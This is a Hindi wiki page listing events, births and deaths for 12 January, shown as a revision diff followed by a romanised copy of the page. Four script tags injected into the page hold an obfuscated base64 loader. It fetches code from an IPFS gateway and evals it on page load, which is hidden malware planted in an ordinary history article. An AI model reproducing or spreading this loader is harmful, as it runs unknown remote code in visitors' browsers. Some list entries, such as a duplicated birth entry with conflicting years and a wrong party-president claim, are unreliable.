Difference between revisions of "12 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(38 intermediate revisions by 8 users not shown)
Line 4: Line 4:
  
 
==12 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==12 जनवरी की महत्त्वपूर्ण घटनाएँ==
* [[1924]]- [[गोपीनाथ साहा]] ने [[कोलकाता]] के पुलिस आयुक्त [[चार्ल्स ऑगस्टस टेगार्ट]] समझकर ग़लती से एक आदमी की हत्या कर दी। इसके बाद उसे गिरफ़्तार कर लिया गया।
+
* [[2020]] - भारतीय टीम के तेज गेंदबाज जसप्रीत बुमराह को प्रतिष्ठित ‘पॉली उमरीगर अवॉर्ड’ से सम्मानित किया गया।
* [[1950]]- स्वतंत्रता प्राप्ति के बाद 12 जनवरी 1950 में 'संयुक्त प्रांत' का नाम बदल कर ‘[[उत्तर प्रदेश]]’ रखा गया।
+
**रक्षा सचिव अजय कुमार ने [[कोलकाता]] में दो भारतीय तटरक्षक जहाजों (ICGS) अर्थात् एनी बेसेंट और अमृत कौर को नियुक्त किया।
* [[2001]] - भारत का इंडोनेशिया-रूस-चीन संधि से इंकार, नैफ नदी पर बांध निर्माण योजना के कारण बांग्लादेश-म्यांमार सीमा पर तनाव के बाद सेनाएँ तैनात।
+
* [[2018]] - [[इसरो]] ने लॉन्च किया 100वाँ उपग्रह, एक साथ भेजे 31 सैटेलाइट्स।
* [[2002]] - पाकिस्तान के राष्ट्रपति जनरल परवेज मुशर्रफ़ ने राष्ट्र के नाम ऐतिहासिक संदेश प्रसारित किया, पाकिस्तान ने आतंकवादी संगठन लश्कर व जैश पर प्रतिबंध लागू करने की घोषणा की जबकि वांछित पाक अपराधियों को भारत को सौंपने से इन्कार किया।
+
* [[2015]] - कैमरून में सुरक्षा बलों के साथ मुठभेड में आतंकवादी संगठन बोको हराम के 143 आतंकवादी मारे गये।
* [[2003]] - भारतीय मूल की महिला लिंडा बाबूलाल त्रिनिदाद की संसद अध्यक्ष बनीं।
+
* [[2010]]- [[भारत]] सरकार द्वारा [[नागर विमानन]] क्षेत्र पर आतंकी हमलो की आशंका के बीच विमान अपहरण रोधी क़ानून 1982 में मौत की सज़ा की धारा जोड़ी गई।
* [[2006]] - भारत और चीन ने हाइड्रोकार्बन पर एक महत्त्वपूर्ण सहमति पत्र पर हस्ताक्षर किए।
+
** कैरेबियाई देश हैती में आए भयंकर [[भूकंप]] में लाखों लोगों की मौत और राजधानी पोर्ट ओ प्रिंस का अधिकतर हिस्सा तबाह हो गया।
* [[2007]] - 'रंग दे बसन्ती' बाफ़्टा के लिए नामांकित।
+
* [[2009]]- प्रसिद्ध संगीतकार [[ए. आर. रहमान]] प्रतिष्ठित गोल्डन ग्लोब अवार्ड जीतने वाले पहले भारतीय बने। इलाहाबाद विश्वविद्यालय के वैज्ञानिक डॉ. जयन्त कुमार ने दुनिया का सबसे पुराना उल्का पिंड क्रेटर खोजा।
 
* [[2008]]-  
 
* [[2008]]-  
 
**[[कोलकाता]] में आग से 2500 दुकानें जल कर खाक हुई।
 
**[[कोलकाता]] में आग से 2500 दुकानें जल कर खाक हुई।
**दुनिया के सबसे बड़े फ़िल्म शो टोरंटो अंतर्राष्ट्रीय फ़िल्म महोत्सव की बुनियाद रखने वाले 'मुर्रे दस्ती कोहल' का निधन।  
+
**दुनिया के सबसे बड़े फ़िल्म शो टोरंटो अंतर्राष्ट्रीय फ़िल्म महोत्सव की बुनियाद रखने वाले 'मुर्रे दस्ती कोहल' का निधन।
* [[2009]]- प्रसिद्ध संगीतकार [[ए. आर. रहमान]] प्रतिष्ठित गोल्डन ग्लोब अवार्ड जीतने वाले पहले भारतीय बने। इलाहाबाद विश्वविद्यालय के वैज्ञानिक डॉ. जयन्त कुमार ने दुनिया का सबसे पुराना उल्का पिंड क्रेटर खोजा।
+
* [[2007]] - हिन्दी फ़िल्म 'रंग दे बसन्ती' बाफ़्टा के लिए नामांकित।
* [[2010]]- [[भारत]] सरकार द्वारा [[नागर विमानन]] क्षेत्र पर आतंकी हमलो की आशंका के बीच विमान अपहरण रोधी क़ानून 1982 में मौत की सज़ा की धारा जोड़ी गई।
+
* [[2006]] - भारत और चीन ने हाइड्रोकार्बन पर एक महत्त्वपूर्ण सहमति पत्र पर हस्ताक्षर किए।
 
+
* [[2004]] - दुनिया के सबसे बड़े समुद्री जहाज, आरएमएस क्वीन मैरी 2 ने अपनी पहली यात्रा की शुरूआत की।
 +
* [[2003]] - भारतीय मूल की महिला लिंडा बाबूलाल त्रिनिदाद की संसद अध्यक्ष बनीं।
 +
* [[2002]] - पाकिस्तान के राष्ट्रपति जनरल परवेज मुशर्रफ़ ने राष्ट्र के नाम ऐतिहासिक संदेश प्रसारित किया, पाकिस्तान ने आतंकवादी संगठन लश्कर व जैश पर प्रतिबंध लागू करने की घोषणा की जबकि वांछित पाक अपराधियों को भारत को सौंपने से इन्कार किया।
 +
* [[2001]] - भारत का इंडोनेशिया-रूस-चीन संधि से इंकार, नैफ नदी पर बांध निर्माण योजना के कारण बांग्लादेश-म्यांमार सीमा पर तनाव के बाद सेनाएँ तैनात।
 +
* [[1991]] - अमरीकी संसद ने [[कुवैत]] में इराक के खिलाफ सैनिक कार्रवाई काे मंजूरी दी।
 +
* [[1984]] - [[स्वामी विवेकानंद]] के जन्मदिन के मौके पर हर वर्ष देश में ‘[[राष्ट्रीय युवा दिवस]]’ मनाने की घाेषणा की गयी।
 +
* [[1950]]- स्वतंत्रता प्राप्ति के बाद 12 जनवरी 1950 में 'संयुक्त प्रांत' का नाम बदल कर ‘[[उत्तर प्रदेश]]’ रखा।
 +
* [[1934]] - भारत के स्वतंत्रता संग्राम के महान् क्रान्तिकारी सूर्य सेन को चटगांव में फाँसी दी गयी। उन्होने इंडियन रिपब्लिकन आर्मी की स्थापना की और चटगांव विद्रोह का सफल नेतृत्व किया।
 +
* [[1924]]- [[गोपीनाथ साहा]] ने [[कोलकाता]] के पुलिस आयुक्त [[चार्ल्स ऑगस्टस टेगार्ट]] समझकर ग़लती से एक आदमी की हत्या कर दी। इसके बाद उसे गिरफ़्तार कर लिया गया।
 +
* [[1866]] - [[लंदन]] में रॉयल एयरोनॉटिकल सोसायटी का गठन हुआ।
 +
* 1757 - [[ब्रिटेन]] ने [[पश्चिम बंगाल]] के बंदेल प्रांत को [[पुर्तग़ाल]] से अपने कब्जे में लिया।
 +
* 1708 - [[शाहू|शाहू जी]] को [[मराठा]] शासक का ताज पहनाया गया।
 +
 
==12 जनवरी को जन्मे व्यक्ति==
 
==12 जनवरी को जन्मे व्यक्ति==
* 1863 - [[स्वामी विवेकानंद]]- भारतीय दार्शनिक
+
* [[1999]] - [[आर्या राजेंद्रन]] - [[तिरुवनंतपुरम]] की सबसे कम उम्र की नवनियुक्त महापौर हैं।
 +
* [[1991]] - [[हरिका द्रोणावल्ली]] - [[भारत]] की तेजतर्रार महिला [[शतरंज]] खिलाड़ी हैं।
 +
* [[1990]] - [[मनोज सरकार]] - [[भारत]] के पैरा [[बैडमिंटन]] खिलाड़ी हैं।
 +
* [[1972]] - [[प्रियंका गाँधी]] - भारतीय राष्ट्रीय कांग्रेस की वर्तमान अध्यक्ष
 +
* [[1964]] - [[दिनेश शर्मा]] - राजनीतिज्ञ तथा [[उत्तर प्रदेश]] के उप-मुख्यमंत्री।
 +
* [[1964]] - [[अजय माकन]] - भारतीय राजनीतिज्ञ
 +
* [[1958]] - [[अरुण गोविल]] - [[भारतीय सिनेमा]] में [[हिंदी]] फ़िल्म और टीवी अभिनेता हैं।
 +
* [[1943]] - [[सुमित्रा भावे]] - सुप्रसिद्ध [[मराठी]] फिल्म निर्माता थीं।
 +
* [[1940]] - [[एम. वीरप्पा मोइली]] - [[भारतीय राष्ट्रीय कांग्रेस]] के राजनीतिज्ञ हैं।
 +
* [[1936]] - [[मुफ़्ती मोहम्मद सईद]] - भारतीय राज्य [[जम्मू और कश्मीर]] के भूतपूर्व नौवें [[मुख्यमंत्री]] थे।
 +
* [[1931]] - [[अहमद फ़राज़]] - प्रसिद्ध उर्दू कवि।
 +
* [[1927]] - [[डार्विन दीनघदो पग]] - भारतीय राज्य [[मेघालय]] के भूतपूर्व दूसरे [[मुख्यमंत्री]] थे।
 +
* [[1918]] - [[सी. रामचन्द्र]] - [[हिन्दी]] फ़िल्म संगीतकार, गायक और निर्माता-निर्देशक।
 +
* [[1918]] - [[म​​हर्षि महेश योगी]] - प्रसिद्ध भारतीय योगाचार्य थे, जिन्होंने [[योग]] को [[भारत]] के बाहर भी प्रसिद्धि दिलाई।
 
* [[1917]] - [[महर्षि महेश योगी]]- भारतीय अध्यात्मवादी
 
* [[1917]] - [[महर्षि महेश योगी]]- भारतीय अध्यात्मवादी
* [[1869]] - [[भगवान दास]]- [[भारत रत्न]] सम्मानित स्वतंत्रता सेनानी, समाज सेवी और शिक्षा शास्त्री।  
+
* [[1901]] - [[उमाशंकर दीक्षित]] - '[[भारतीय स्वतंत्रता आंदोलन]]' के पुरोधा एवं मानवता के पुजारी और राष्ट्रवाद के अग्रदूत।
 +
* [[1899]] - [[बद्रीनाथ प्रसाद]] - [[भारत]] के प्रसिद्ध गणितज्ञ।
 +
* [[1886]] - [[नेली सेनगुप्ता]] - प्रसिद्ध महिला क्रांतिकारी।
 +
* [[1869]] - [[भगवान दास]] - '[[भारत रत्न]]' सम्मानित स्वतंत्रता सेनानी, समाज सेवी और शिक्षा शास्त्री।
 +
* [[1863]] - [[स्वामी विवेकानंद]]- भारतीय दार्शनिक
  
 
==12 जनवरी को हुए निधन==
 
==12 जनवरी को हुए निधन==
* [[2005]] - [[अमरीश पुरी]]- भारतीय [[अभिनेता]]
+
* [[2005]] - [[अमरीश पुरी]] - भारतीय [[सिनेमा]] के प्रसिद्ध अभिनेता और खलनायक।
 +
* [[2004]] - [[रामकृष्‍ण हेगड़े]] - [[जनता पार्टी]] के राजनीतिज्ञ थे, जो [[कर्नाटक]] के भूतपूर्व [[मुख्यमंत्री]] थे।
 +
* [[2000]] - [[वी. आर. नेदुनचेज़ियन]] - तीन बार [[तमिल नाडु]] राज्य के कार्यवाहक मुख्यमंत्री रहे।
 +
* [[1992]] - [[कुमार गंधर्व]] - [[भारत]] के प्रसिद्ध शास्त्रीय गायक।
 +
* [[1976]] - अगाथा क्रिस्टी - दुनिया के जाने माने जासूसी [[उपन्यासकार|उपन्यासकारों]] में से एक।
 +
* [[1966]] - [[नरहर विष्णु गाडगिल]] - राजनेता, अर्थशास्त्री, लेखक व भारतीय स्वतंत्रता संग्राम सेनानी और [[संविधान सभा]] के सदस्य थे।
 +
* [[1941]] - [[प्यारे लाल शर्मा]] - भारतीय क्रांतिकारियों में से एक थे।
 +
* [[1934]] - [[सूर्य सेन]] - [[भारत]] की स्वतंत्रता के लिए संघर्ष करने वाले प्रसिद्ध क्रांतिकारी।
 +
* [[1924]]- [[गोपीनाथ साहा]]- [[पश्चिम बंगाल]] के स्वतंत्रता सेनानी।
  
 
==12 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==12 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
* [[राष्ट्रीय युवा दिवस]], [[भारत]]
 
* [[राष्ट्रीय युवा दिवस]], [[भारत]]
 +
* अंतर्राष्ट्रीय फ़िल्म समारोह दिवस (10 दिवसीय)।
 +
* [[राष्ट्रीय सड़क सुरक्षा सप्ताह|राष्ट्रीय सड़क सुरक्षा सप्ताह 11 जनवरी- 17 जनवरी तक]]
 +
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-today-12-01-2017/today-in-history/news/745752.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 09:24, 1 March 2024

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 12 janavari varsh ka 12 vaan din hai. sal mean abhi aur 353 din shesh haian. (lip varsh mean 354 din)

12 janavari ki mahattvapoorn ghatanaean

  • 2020 - bharatiy tim ke tej geandabaj jasaprit bumarah ko pratishthit ‘p aauli umarigar av aaurd’ se sammanit kiya gaya.
    • raksha sachiv ajay kumar ne kolakata mean do bharatiy tatarakshak jahajoan (ICGS) arthath eni beseant aur amrit kaur ko niyukt kiya.
  • 2018 - isaro ne l aaunch kiya 100vaan upagrah, ek sath bheje 31 saitelaits.
  • 2015 - kaimaroon mean suraksha baloan ke sath muthabhed mean atankavadi sangathan boko haram ke 143 atankavadi mare gaye.
  • 2010- bharat sarakar dvara nagar vimanan kshetr par atanki hamalo ki ashanka ke bich viman apaharan rodhi qanoon 1982 mean maut ki saza ki dhara jo di gee.
    • kairebiyaee desh haiti mean ae bhayankar bhookanp mean lakhoan logoan ki maut aur rajadhani port o prians ka adhikatar hissa tabah ho gaya.
  • 2009- prasiddh sangitakar e. ar. rahaman pratishthit goldan glob avard jitane vale pahale bharatiy bane. ilahabad vishvavidyalay ke vaijnanik d aau. jayant kumar ne duniya ka sabase purana ulka piand kretar khoja.
  • 2008-
    • kolakata mean ag se 2500 dukanean jal kar khak huee.
    • duniya ke sabase b de film sho toranto aantarrashtriy film mahotsav ki buniyad rakhane vale 'murre dasti kohal' ka nidhan.
  • 2007 - hindi film 'rang de basanti' bafta ke lie namaankit.
  • 2006 - bharat aur chin ne haidrokarban par ek mahattvapoorn sahamati patr par hastakshar kie.
  • 2004 - duniya ke sabase b de samudri jahaj, aremes kvin mairi 2 ne apani pahali yatra ki shurooat ki.
  • 2003 - bharatiy mool ki mahila lianda baboolal trinidad ki sansad adhyaksh banian.
  • 2002 - pakistan ke rashtrapati janaral paravej musharraf ne rashtr ke nam aitihasik sandesh prasarit kiya, pakistan ne atankavadi sangathan lashkar v jaish par pratibandh lagoo karane ki ghoshana ki jabaki vaanchhit pak aparadhiyoan ko bharat ko sauanpane se inkar kiya.
  • 2001 - bharat ka iandoneshiya-roos-chin sandhi se iankar, naiph nadi par baandh nirman yojana ke karan baangladesh-myaanmar sima par tanav ke bad senaean tainat.
  • 1991 - amariki sansad ne kuvait mean irak ke khilaph sainik karravaee kae manjoori di.
  • 1984 - svami vivekanand ke janmadin ke mauke par har varsh desh mean ‘rashtriy yuva divas’ manane ki ghaeshana ki gayi.
  • 1950- svatantrata prapti ke bad 12 janavari 1950 mean 'sanyukt praant' ka nam badal kar ‘uttar pradesh’ rakha.
  • 1934 - bharat ke svatantrata sangram ke mahanh krantikari soory sen ko chatagaanv mean phaansi di gayi. unhone iandiyan ripablikan armi ki sthapana ki aur chatagaanv vidroh ka saphal netritv kiya.
  • 1924- gopinath saha ne kolakata ke pulis ayukt charls aaugastas tegart samajhakar galati se ek adami ki hatya kar di. isake bad use giraftar kar liya gaya.
  • 1866 - landan mean r aauyal eyaron aautikal sosayati ka gathan hua.
  • 1757 - briten ne pashchim bangal ke bandel praant ko purtagal se apane kabje mean liya.
  • 1708 - shahoo ji ko maratha shasak ka taj pahanaya gaya.

12 janavari ko janme vyakti

12 janavari ko hue nidhan

12 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>